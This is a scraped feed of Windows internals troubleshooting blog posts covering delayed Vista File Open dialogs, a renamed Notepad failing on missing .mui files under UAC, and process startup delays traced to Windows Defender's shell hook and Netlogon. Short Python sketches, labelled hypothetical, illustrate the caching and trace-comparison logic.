I did so by brute force: I dumped the functions implemented by Secur32.Dll and looked for ones with “name” in them: </FONT> </P> <IMG original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/532471/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120952iACFB35EE4A6F2A01" /> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> I set breakpoints on several of them and when I reproduced the delay I hit the one on SecpGetUserName and stepped through it to eventually get to this stack: </FONT> </P> <IMG original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/532472/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120953i980BA465BB954ED5" /> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> The <A class="" href="#" mce_href="#" target="_blank"> DsGetDcName </A> function is documented as returning the name of a domain controller in the specified domain. SecpTranslateName obviously needs to find a domain controller to which to send the account display name query. I traced further, and discovered that LSASS caches the result of the lookup for 45 seconds, which explained why I didn’t see the delay if I ran a different application and accessed the File Open dialog immediately after getting a delay. Then I hit a temporary dead-end when Netapi32!DsrGetDcNameEx2 executed an RPC request. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> Again, figuring that Netapi32 acts like a client and a server, I dumped its symbols and set breakpoints on functions containing “dc”. I let LSASS continue executing and to my surprise hit the exact same function, Netapi32!DsrGetDcNameEx2. 
I traced into the call deeper and deeper until the thread finally called into the kernel (Ntdll!KiFastSystemCallRet): </FONT> </P> <IMG original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/532473/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120954iD7084ABBAE4656CB" /> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> I was close to the end of my investigation. The last question I had was what device driver was Netlogon calling to send a browser datagram? I answered this by looking at the first parameter it passed to NlBrowserDeviceIoControl, which I guessed was a handle to a file object. Then I opened Windbg in Local Kernel Debugging mode (note that on Windows Vista you have to boot in debugging mode to do this), which lets you look at live kernel data structures, and dumped the handle’s information. That showed me the device object that was opened, which told me that the driver is Bowser.sys, the “NT Lan Manager Datagram Receiver Driver”: </FONT> </P> <IMG original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/532474/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120955iBBF3FB3AF46C1018" /> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <SPAN style="mso-no-proof: yes"> <FONT face="Calibri" size="3"> I thought my investigation was complete, but when I later tried to reproduce the delays I failed. I retraced my footsteps and found that LsapGetUserNameForLogonSession caches the display name for 30 minutes. Further, an account’s display name is cached with cached credentials so you won’t experience the delays for the first 30 minutes after logging in or disconnecting from the corporate network. <SPAN style="mso-spacerun: yes"> </SPAN> I confirmed that by waiting 30 minutes and reproducing the hangs. 
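</FONT> </SPAN> </P> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> The caching behavior explains why the delay was hard to reproduce. A minimal sketch in Python, assuming a hypothetical TtlCache class and slow_lookup function: the 30-minute lifetime comes from the text, while everything else is illustrative and is not how LSASS is implemented. A fake clock is injected so the example runs instantly. </FONT> </P>

```python
import time


class TtlCache:
    """Cache a single looked-up value for a fixed lifetime in seconds."""

    def __init__(self, lookup, lifetime, clock=time.monotonic):
        self._lookup = lookup
        self._lifetime = lifetime
        self._clock = clock
        self._value = None
        self._expires = None

    def get(self):
        now = self._clock()
        if self._expires is None or now >= self._expires:
            # Cache is empty or stale: pay for the slow lookup again.
            self._value = self._lookup()
            self._expires = now + self._lifetime
        return self._value


if __name__ == "__main__":
    calls = []

    def slow_lookup():
        # Stand-in for the display name query that stalls off-network.
        calls.append(1)
        return "markruss"

    fake_now = [0.0]
    cache = TtlCache(slow_lookup, lifetime=30 * 60, clock=lambda: fake_now[0])
    cache.get()              # first call performs the lookup
    fake_now[0] = 29 * 60
    cache.get()              # still cached, so no delay
    fake_now[0] = 31 * 60
    cache.get()              # expired, so the lookup (and delay) returns
    print(len(calls))        # prints 2
```

<P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <SPAN style="mso-no-proof: yes"> <FONT face="Calibri" size="3"> Any attempt to reproduce the hang inside the cache window behaves like the second call in the sketch: it returns immediately and hides the problem. 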
</FONT> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> My investigation had come to a close. I had determined that Windows Vista’s File Open dialog tries to look up a user’s display name for the “bread crumb” bar when showing the documents folder and in the process tries to locate a domain controller by sending a Lan Manager datagram via the Bowser.sys device driver. I also knew that there’s no workaround for the delayed dialogs and that anyone that has a domain joined system that’s not connected to their domain will experience the same delays - at least until Windows Vista Service Pack 1. </FONT> </P> </BODY></HTML> Thu, 27 Jun 2019 06:30:43 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-delayed-windows-vista-file-open-dialogs/ba-p/723543 MarkRussinovich 2019-06-27T06:30:43Z The Case of the Notepad that Wouldn't Run https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-notepad-that-wouldn-t-run/ba-p/723535 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Oct 01, 2006 </STRONG> <BR /> <P> <A href="#" mce_href="#" target="_blank"> Dave Solomon </A> was on campus a couple of weeks ago presenting a Windows internals seminar to Microsoft developers. Before I joined Microsoft I taught the classes here at Microsoft with him, but now with my other responsibilities here I step into the class and guest present a module or two if my schedule permits. This time I presented the security module, which describes logon (authentication) and the access check (authorization) model. It also includes a separate section on Vista’s User Account Control (UAC) feature, which consists of several technologies including virtualization and a new Mandatory Integrity Control (MIC) security model that’s layered on top of the existing Discretionary Access Control model that Windows NT introduced in its first release. 
<BR /> </P> <P> UAC allows for users, even administrators, to run as standard users most of the time, while giving them the ability to run executables with administrator rights when necessary. There are several mechanisms by which executables can trigger a request for administrator rights: <BR /> </P> <OL> <BR /> <LI> If the executable image includes a Vista manifest file that specifies a desire or need for administrator rights (this would be added by the developer who creates the image). <BR /> </LI> <LI> If the executable is in Vista’s application compatibility database as a legacy application that Microsoft has identified as requiring administrator rights to run correctly. <BR /> </LI> <LI> If the user explicitly requests an elevation using Explorer’s “Run as administrator” menu item in the context menu for executables (also can be set as an advanced shortcut property). Note that this does not run the executable under the Administrator account, but rather under the account of the logged in user, but with the Administrator group enabled in the process security token. <BR /> </LI> <LI> If the executable is determined to be a setup or installer program (for example, if the word “setup” or “update” is in the image’s name). </LI> </OL> <BR /> <P> Perhaps the most common need for administrator rights comes from setup programs, which generally can’t install properly without write access to HKLM\Software and \Program Files, two locations that only administrators can modify. As an ad-hoc demonstration of the last request method, during the presentation I copied \Windows\Notepad.exe to my account’s profile directory, renaming it to Notepad-setup.exe in the process. 
Then I launched it, expecting to see a Consent dialog like the one below ask me to grant the renamed Notepad administrative rights: <BR /> </P> <P> <IMG mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/460301/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/460301/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120941i4B8CF8FA87CFBB05" /> <BR /> </P> <P> To my consternation, no such dialog appeared. In fact, nothing happened. I reran it and got the same result. I was thoroughly confused, but didn’t have time to investigate in front of the class, so I moved on. <BR /> </P> <P> When I later got a chance to investigate what had happened, I started Notepad-setup.exe using Windbg (part of the free <A href="#" mce_href="#" target="_blank"> Debugging Tools for Windows </A> ) by clicking “File-&gt;Open Executable” followed by “Debug-&gt;Go” (or you can press F5). I then stepped through the initial instructions of Notepad’s entry point, Winmain. I saw it call an initialization function named NPInit that invokes LoadAccelerators to load Notepad’s keyboard accelerators. Strangely, LoadAccelerators was failing, causing NPInit to return an error to Winmain and Notepad to silently exit. But why would Notepad fail to load its accelerators, which should be included in the Notepad image itself? <BR /> </P> <P> My next step was to see if the file’s name was somehow causing the different behavior so I tried running a copy of Notepad.exe with the original name from my user directory, but got the same behavior (or lack thereof). It was time to watch what was happening with <A href="#" mce_href="#" target="_blank"> Filemon </A> . <BR /> </P> <P> This scenario called for logging the operation of Notepad’s successful execution and comparing that to the log of the failing execution. 
I started Filemon, set the Include filter to Notepad.exe and the Exclude filter to list the processes that reference Notepad’s image when Notepad launches, including Svchost (where the prefetcher runs) and Explorer (which I was using to launch Notepad): <BR /> </P> <P> <IMG mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/460302/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/460302/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120942i3456BE82D6AE8476" /> <BR /> </P> <P> I collected both traces, but before I could compare them I had to remove the columns that are always different in different execution traces: Sequence, Timestamp, and Process. To do this I loaded the traces into Excel, selected the data in the first three columns, deleted it, and saved the traces back out as tab-delimited text. You can get the two trace files <A href="#" mce_href="#" target="_blank"> here </A> . <BR /> </P> <P> There are a number of text comparison tools available, but one that’s both free and that serves the needs of this type of comparison is Microsoft’s <A href="#" mce_href="#" target="_blank"> Windiff </A> . Simply open both files, and red and yellow lines highlight the differences. 
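<BR /> </P> <P> The Excel-and-Windiff steps can also be scripted. The following is a minimal sketch in Python, assuming tab-delimited logs whose first three columns are Sequence, Timestamp, and Process as described above. The function names and the sample rows are hypothetical and are not taken from the actual trace files. <BR /> </P>

```python
import difflib


def strip_volatile_columns(lines, count=3):
    """Drop the first `count` tab-separated columns from every trace line."""
    return ["\t".join(line.rstrip("\n").split("\t")[count:]) for line in lines]


def compare_traces(good_lines, bad_lines):
    """Return unified-diff lines between two cleaned traces."""
    good = strip_volatile_columns(good_lines)
    bad = strip_volatile_columns(bad_lines)
    return list(difflib.unified_diff(good, bad, "good", "bad", lineterm=""))


if __name__ == "__main__":
    # Made-up sample rows in the column order the text describes.
    good = ["1\t10:00:01\tnotepad.exe:100\tOPEN\tC:\\Windows\\en-US\tSUCCESS\n"]
    bad = ["1\t10:05:09\tnotepad.exe:200\tOPEN\tC:\\Users\\me\\en-US\tPATH NOT FOUND\n"]
    for line in compare_traces(good, bad):
        print(line)
```

<P> Rows that differ only in the stripped columns produce no diff output, so what remains are the operations that genuinely differ between the two runs. 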
<BR /> </P> <P> The first few lines that Windiff flags are Notepad reading its prefetch file, which has a different name in each trace because the name encodes the full path of the Notepad image it is associated with in a hash number: <BR /> </P> <P> <IMG mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/460294/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/460294/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120943i4D9B746A55CC8572" /> <BR /> </P> <P> The next set of differences are operations present only in the successful run of Notepad, and appear to be queries of some kind of global Windows resource cache that’s new to Windows Vista: <BR /> </P> <P> <IMG mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/460295/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/460295/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120944i193DF21030B6665A" /> <BR /> </P> <P> It wasn't clear to me why one run references the cache and the other doesn’t, so I continued to scan through the differences. 
The next&nbsp;group of differences&nbsp;is at lines 47-51 and is simply due to the different paths of the two Notepad copies: <BR /> </P> <P> <IMG mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/460296/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/460296/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120945iF3684CC8B43C5838" /> <BR /> </P> <P> Finally, at line 121 I came across something that looked like it might be the source of the problem: <BR /> </P> <P> <IMG mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/460297/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/460297/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120946iFC5AEE1EC6616043" /> <BR /> </P> <P> The execution of \Windows\Notepad.exe successfully reads a file named Notepad.exe.mui from the \Windows\En-us subdirectory. Further, at line 172 in the trace comparison the failed launch of Notepad tries to read a file of the same name from an En-us subdirectory, but fails because the subdirectory doesn’t exist: <BR /> </P> <P> <IMG mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/460299/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/460299/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120947i4C31CDA047789710" /> <BR /> </P> <P> I knew that .mui files store language-dependent resources like strings and accelerators, so I was pretty certain that Notepad’s failure to load its accelerators was due to its inability to find the appropriate resource file for my locale, US English (En-us). 
To verify this I made an En-us subdirectory in my profile directory and copied Notepad.exe.mui into it, reran Notepad from my directory, and it worked. <BR /> </P> <P> Previous versions of Windows used .mui files to separate language-specific data from executables, but I didn’t know that in Windows Vista this capability is exposed for applications to use. The nice thing about the .mui support is that resource-related functions like LoadAccelerators and FindResourceEx do the magic of locating the language-specific resource files, so application developers don’t need to do any special coding to take advantage of it. <BR /> </P> <P> Now that I had Notepad working outside of the Windows directory I turned my attention to why I hadn’t been presented with a UAC Consent dialog asking me to give it permission to run with administrator rights. What I discovered empirically, and then confirmed later in the <A href="#" mce_href="#" target="_blank"> Understanding and Configuring User Account Control in Windows Vista </A> article on Microsoft.com, is that heuristic setup detection only applies to files that don’t have an embedded manifest that specifies a security TrustLevel. Notepad, like all the Windows executables in Windows Vista, does include a manifest. You can see it when you do a dump of Notepad’s strings with the Sysinternals <A href="#" mce_href="#" target="_blank"> Strings </A> utility: <BR /> </P> <P> <IMG mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/460300/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/460300/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120948iD19998671E6BDB70" /> <BR /> </P> <P> So, thanks to Filemon, the case of the Notepad that wouldn’t run was closed! 
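</P> <P> The interaction between the manifest and the name-based installer detection can be summarized in a rough sketch. It is written in Python with hypothetical helper names and simplifies heavily: it checks only the two file name keywords mentioned earlier, and it assumes that a manifest can be spotted by searching the raw image bytes for the requestedExecutionLevel string, which approximates what a Strings dump reveals. It is not Vista’s real detection logic. </P>

```python
KEYWORDS = ("setup", "update")  # the two name hints mentioned in the text


def has_execution_level_manifest(image_bytes):
    """Crude check: does the image embed a manifest requesting a level?"""
    return b"requestedExecutionLevel" in image_bytes


def heuristic_would_apply(file_name, image_bytes):
    """Name-based installer detection is skipped when a manifest is present."""
    if has_execution_level_manifest(image_bytes):
        return False
    return any(word in file_name.lower() for word in KEYWORDS)


if __name__ == "__main__":
    # Made-up byte strings standing in for two executable images.
    manifest_image = b"MZ...requestedExecutionLevel level=asInvoker..."
    plain_image = b"MZ...no manifest here..."
    print(heuristic_would_apply("Notepad-setup.exe", manifest_image))  # False
    print(heuristic_would_apply("Notepad-setup.exe", plain_image))     # True
```

<P> Under these assumptions the renamed Notepad falls into the first case, which matches the missing Consent dialog. 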
</P> </BODY></HTML> Thu, 27 Jun 2019 06:29:52 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-notepad-that-wouldn-t-run/ba-p/723535 MarkRussinovich 2019-06-27T06:29:52Z The Case of the Process Startup Delays https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-process-startup-delays/ba-p/723526 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Aug 31, 2006 </STRONG> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> I’ve been extremely busy here at Microsoft and so haven’t had time to blog until now, but plan on getting back to posting regularly. Before I start with a look at a technical problem I ran into recently, I’m pleased to report that the Sysinternals integration is proceeding smoothly and that Bryce and I will unveil an exciting new tool when the site moves to its new home under Microsoft TechNet in late October. </P> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> </P> <P> </P> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> I don’t use my laptop much when I’m not traveling, but I occasionally read email on it in the living room. Like most Windows users, I’m frustrated by occasional unexplained delays when I perform routine tasks like start a program or open a web page. Since joining my laptop to an internal Microsoft domain, I began experiencing regular delays when starting processes. With my Sysinternals tools arsenal in hand, I set out to investigate the root cause, suspecting that recently joining the laptop to the Microsoft domain played a role. </P> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> </P> <P> </P> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> I began my research by first noticing that, after a delay of a few seconds starting a new process, processes I started within the following 30 seconds launched instantly. 
I therefore started <A href="#" target="_blank"> Process Explorer </A> , waited for 30 seconds, and then executed Notepad from Explorer’s Run dialog. Notepad didn’t appear in Process Explorer’s process tree during the expected delay, which implied the Explorer thread starting Notepad was experiencing the pause, not Notepad’s startup. </P> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> </P> <P> </P> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> A look at the stack of the launching Explorer thread might give me a hint about the cause, but I was too impatient to look at each of Explorer’s over a dozen threads and so attached the Windbg debugger from the <A href="#" target="_blank"> Microsoft Debugging Tools for Windows </A> to Process Explorer, launched Notepad with Process Explorer’s Run dialog, and broke into the debugger. I opened the thread list in Windbg by selecting Processes and Threads from the View menu, selected the first one displayed, and then revisited the View menu to open the Call Stack dialog: </P> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> </P> <P> <A href="#" target="_blank"> </A> </P> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <A href="#" target="_blank"> </A></P><P> <BR /> </P> <P></P> <P class="MsoNormal" style="MARGIN: 
0in 0in 0pt"> </P> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> Stacks display with the most recently called function at the top, so the ZwWaitForSingleObject frame at the top meant that the thread was waiting on some object to become signaled. The frames below it, which belong to its callers, are in the RPCRT4 (Remote Procedure Call Runtime Version 4) DLL, and the reference to the OpenLpcPort function told me that the thread was trying to initiate an RPC with another process on the same system. It looked like the wait might be due to the GetMachineAccountSid call highlighted in the screenshot. Just like domain users, computers belonging to a domain have accounts, and GetMachineAccountSid’s name implies that the function returns the Security Identifier (SID) of the computer’s domain account. </P> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> </P> <P> </P> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> I set a breakpoint on the return from the call to GetMachineAccountSid in the OpenLpcPort function and, after a short pause consistent with the startup delays, the debugger’s command prompt activated. 
The x86 calling convention passes function return values in the EAX register, so I examined its value: </P> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> </P> <P> </P> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> </P> <P> <A href="#" target="_blank"> </A></P><P> <BR /> </P> <P></P> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> </P> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> After translating the value to decimal with the “?” command, I searched for 1789 in the global error definitions file, WinError.h, of the Platform SDK: </P> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> </P> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <A href="#" target="_blank"> </A></P><P> <BR /> </P> <P></P> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> </P> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> I scoured MSDN documentation and the Web and found essentially no information on the underlying cause for that error code. However, the term “trusted relationship failure” implies that the domain the computer is connecting to doesn’t trust the domain of the computer. But under the circumstances the error didn’t make sense, because I was disconnected from the network and, even if the computer was trying to connect to a domain, the only one it would connect to is the one it belonged to. 
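</P> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> The translation from a raw register value to a named error can also be reproduced outside the debugger. The Python sketch below is only an illustration: it assumes the register held 0x6fd (the hexadecimal form of 1789; the text above gives only the decimal value), and the describe_error helper and its one-entry lookup table are hypothetical names. ERROR_TRUSTED_RELATIONSHIP_FAILURE is the WinError.h symbol for 1789. </P>

```python
# Minimal sketch: turn a raw return value, as read from EAX, into a decimal
# Win32 error code and a symbolic name.
# Assumption: the register held 0x6fd; the article states only decimal 1789.
KNOWN_ERRORS = {
    1789: "ERROR_TRUSTED_RELATIONSHIP_FAILURE",  # symbol defined in WinError.h
}


def describe_error(raw_hex: str) -> str:
    """Convert a hexadecimal register value to 'decimal (name)'."""
    code = int(raw_hex, 16)  # accepts "6fd" as well as "0x6fd"
    name = KNOWN_ERRORS.get(code, "unknown error")
    return f"{code} ({name})"


print(describe_error("6fd"))  # 1789 (ERROR_TRUSTED_RELATIONSHIP_FAILURE)
```

<P class="MsoNormal" style="MARGIN: 0in 0in 0pt">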
</P> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> </P> <P> </P> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> On a hunch, though, I opened a command prompt and ran <A href="#" target="_blank"> PsGetSid </A> to see what error it would get when trying to look up the computer’s domain SID (a computer’s domain account name is the computer name with a “$” appended to it): </P> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> </P> <P> </P> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <A href="#" target="_blank"> </A></P><P> <BR /> </P> <P></P> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> </P> <P> </P> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> Sure enough, it experienced the same delay, which must be a network timeout, and got the same error. Then I used remote access to connect to the domain and ran the command again: </P> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> </P> <P> </P> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> </P> <P> <A href="#" target="_blank"> </A></P><P> <BR /> </P> <P></P> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> </P> <P> <A href="#" target="_blank"> </A> </P> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> </P> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> Further, after connecting to the domain I no longer experienced the startup delays. I disconnected, but continued to have delay-free process launches, even after 30 seconds. After rebooting and not connecting, though, the delays reoccurred. </P> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> </P> <P> </P> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> At that point I decided to investigate the internals of GetMachineAccountSid. The stack trace showed that it calls into the Netlogon DLL, which performs its own RPC to a function called NetrLogonGetTrustRid. 
I knew that the Netlogon service runs inside of the Local Security Authority Subsystem (LSASS): </P> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> </P> <P> </P> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> </P> <P> <A href="#" target="_blank"> </A></P><P> <BR /> </P> <P></P> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> </P> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> I attached Windbg to LSASS and set a breakpoint on NetrLogonGetTrustRid. After launching a new process I hit the breakpoint and saw that if a particular field in a data structure is NULL, Netlogon tries to connect to a domain controller, but if the connection fails for any reason, it blindly returns error 1789. However, when I connected to the domain the call succeeded and the value in the data structure filled in with the SID of the computer account, which persists even after a disconnect. That explained the change in behavior after I connected to the domain. </P> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> </P> <P> </P> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> Turning my attention back to GetMachineAccountSid, I found that it caches the results of an error for 30 seconds before asking NetLogon to attempt to connect to a domain controller again. That explained the 30 second quick-start periods. A look through the code flow in the debugger also revealed that OpenLpcPort queries the computer SID as part of a check to see if it matches the SID passed as one of its parameters. If so, OpenLpcPort changes the SID to the SID of the Local System account before calling NtSecureConnectPort, mapping the domain SID to a local one. NtSecureConnectPort takes a SID as a parameter and will only connect to the specified Local Procedure Call (LPC) port if the port was created by the account that matches the SID. 
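</P> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> The caching behavior described above can be modeled in a few lines. This Python sketch is not the actual Windows code: the class and method names, the injected lookup function, and the injected clock are all hypothetical, and it collapses the Netlogon and GetMachineAccountSid layers into one object. Only the 30-second error cache, the SID that persists after one successful lookup, and error 1789 come from the text. </P>

```python
# Minimal model of the observed behavior; not the real implementation.
# Assumptions: all names here are hypothetical, and the two layers
# (Netlogon and GetMachineAccountSid) are merged into one class.
import time

ERROR_TRUSTED_RELATIONSHIP_FAILURE = 1789
ERROR_CACHE_SECONDS = 30


class MachineSidCache:
    def __init__(self, query_domain_controller, clock=time.monotonic):
        self._query = query_domain_controller  # returns a SID string or None
        self._clock = clock
        self._sid = None       # filled in once, kept for the boot session
        self._retry_at = None  # earliest time to contact the DC again

    def get_machine_account_sid(self):
        """Return (error_code, sid); error_code 0 means success."""
        if self._sid is not None:
            return 0, self._sid  # fast path after one successful lookup
        now = self._clock()
        if self._retry_at is not None and self._retry_at > now:
            # Failure is still cached: answer instantly, no network access.
            return ERROR_TRUSTED_RELATIONSHIP_FAILURE, None
        sid = self._query()  # may block for a network timeout (the delay)
        if sid is None:
            self._retry_at = now + ERROR_CACHE_SECONDS
            return ERROR_TRUSTED_RELATIONSHIP_FAILURE, None
        self._sid = sid
        return 0, sid
```

In this model the first call while offline pays the timeout, calls during the next 30 seconds return the cached error immediately, and a single successful lookup removes the delay until the object is recreated, which stands in for a reboot.

<P class="MsoNormal" style="MARGIN: 0in 0in 0pt">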
</P> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> </P> <P> </P> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> I’d answered a number of questions, but the big one remained: why was an RPC happening during a process launch at all? The initial stack trace only went up as far as the NegotiateTransferSyntax frame, but there were obviously other frames that the symbol engine couldn’t determine. The stack display went further when I had hit the breakpoint I set in OpenLpcPort, though: </P> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> </P> <P> </P> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <A href="#" target="_blank"> </A></P><P> <BR /> </P> <P></P> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> </P> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> Near the bottom you can see the call to ShellExecCmdLine that the CRunDlg class, which is responsible for the Run dialog implementation, calls. That eventually results in what looks like the execution of shell execute hook extensions, and the one that makes the RPC call is implemented by the MpShHook DLL. I didn’t know off hand what that DLL was, but Process Explorer’s DLL view showed that it’s part of Windows Defender: </P> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> </P> <P> </P> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> </P> <P> <A href="#" target="_blank"> </A></P><P> <BR /> </P> <P></P> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> </P> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> I suspected that the hook is part of Windows Defender’s real-time protection, which the Windows Defender team confirmed. 
<A href="#" target="_blank"> Autoruns </A> reports that Windows Defender registers the shell execute hook: </P> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> </P> <P> </P> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <A href="#" target="_blank"> </A></P><P> <BR /> </P> <P></P> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> </P> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> The mystery was solved! Putting it all together: </P> <OL> <BR /> <LI> <BR /> <DIV class="MsoNormal" style="MARGIN: 0in 0in 0pt"> Explorer’s Run dialog calls ShellExecCmdLine </DIV> <BR /> </LI> <LI> <BR /> <DIV class="MsoNormal" style="MARGIN: 0in 0in 0pt"> ShellExecCmdLine calls out to shell execute hooks </DIV> <BR /> </LI> <LI> <BR /> <DIV class="MsoNormal" style="MARGIN: 0in 0in 0pt"> Windows Defender’s hook for real-time protection, MpShHook.Dll, makes an RPC call to communicate with the Windows Defender service, passing the SID of the service as an argument </DIV> <BR /> </LI> <LI> <BR /> <DIV class="MsoNormal" style="MARGIN: 0in 0in 0pt"> The RPC library calls GetMachineAccountSid to see if the SID matches the computer’s domain SID, in which case it would map the SID to the local system account SID </DIV> <BR /> </LI> <LI> <BR /> <DIV class="MsoNormal" style="MARGIN: 0in 0in 0pt"> GetMachineAccountSid performs an RPC to the Netlogon service to get the computer account’s SID </DIV> <BR /> </LI> <LI> <BR /> <DIV class="MsoNormal" style="MARGIN: 0in 0in 0pt"> If the computer account’s SID hasn’t been obtained already, Netlogon tries to connect to a domain controller </DIV> <BR /> </LI> <LI> <BR /> <DIV class="MsoNormal" style="MARGIN: 0in 0in 0pt"> If the domain controller connection fails after a timeout (the delay), Netlogon returns a trust-relationship failure error </DIV> <BR /> </LI> <LI> <BR /> <DIV class="MsoNormal" style="MARGIN: 0in 0in 0pt"> The Windows Defender RPC proceeds using the unmapped SID </DIV> <BR /> </LI> <LI> <BR 
